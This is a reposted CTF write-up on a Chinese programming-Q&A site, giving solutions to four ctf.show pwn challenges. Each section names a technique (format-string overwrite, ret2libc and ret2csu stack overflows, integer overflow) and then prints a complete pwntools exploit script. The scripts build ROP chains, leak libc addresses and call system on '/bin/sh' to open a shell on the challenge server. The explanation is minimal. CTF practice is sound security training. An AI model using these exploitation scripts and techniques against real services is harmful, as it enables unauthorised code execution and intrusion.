當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-CTFSHOW-3

發布時間：2023/12/10 编程问答 21 豆豆

生活随笔收集整理的這篇文章主要介紹了 PWN-PRACTICE-CTFSHOW-3 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PWN-PRACTICE-CTFSHOW-3

- pwn10
- 萌新賽-簽到題
- 萌新賽-數學99
- 內部賽-簽到題

pwn10

格式化字符串漏洞，覆寫num為16即可打印出flag

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1")#gdb.attach(io,"b * 0x080485D0") #pause()num_addr=0x0804A030 io.recvuntil("try pwn me?") payload=p32(num_addr)+"8"*12+"%7$hhn" io.sendline(payload)#pause()io.interactive()

萌新賽-簽到題

棧溢出，ret2libc

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28018) elf=ELF("./pwn1")puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main_addr=0x400687 pop_rdi=0x400793 ret=0x40053eio.recvuntil("successful!\n") payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) io.sendline(payload) puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-0x0809c0 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9aio.recvuntil("successful!\n") payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr) io.sendline(payload)io.interactive()

萌新賽-數學99

整型溢出

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28171) elf=ELF("./pwn1")io.sendlineafter("a:",str(2147483658)) io.sendlineafter("b:",str(2147483649))io.sendlineafter("a:",str(9629)) io.sendlineafter("b:",str(446045))io.sendlineafter("a:",str(2147483648)) io.sendlineafter("b:",str(-1))io.interactive()

內部賽-簽到題

棧溢出，ret2csu

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28116) elf=ELF("./pwn1")write_got=elf.got["write"] write_plt=elf.plt["write"] main_addr=0x4005FDgadget_2=0x00000000004006A0 gadget_1=0x00000000004006BA def com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):payload="a"*(160+8)payload+=p64(gadget_1)payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)payload+=p64(gadget_2)payload+="a"*56 payload+=p64(main_addr)return payloadio.recvuntil("Try Pwn Me?\n") payload=com_gadget(0,1,write_got,8,write_got,1,main_addr) io.sendline(payload) write_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("write_addr=="+hex(write_addr)) libc_base=write_addr-0x110140 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9apop_rdi=0x4006c3 ret=0x4004a9 io.recvuntil("Try Pwn Me?\n") payload="a"*(160+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) io.sendline(payload)io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-3的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Callable接口-创建线程的第三种方
下一篇： PC拒绝牙膏！PCIe 7.0官宣：速度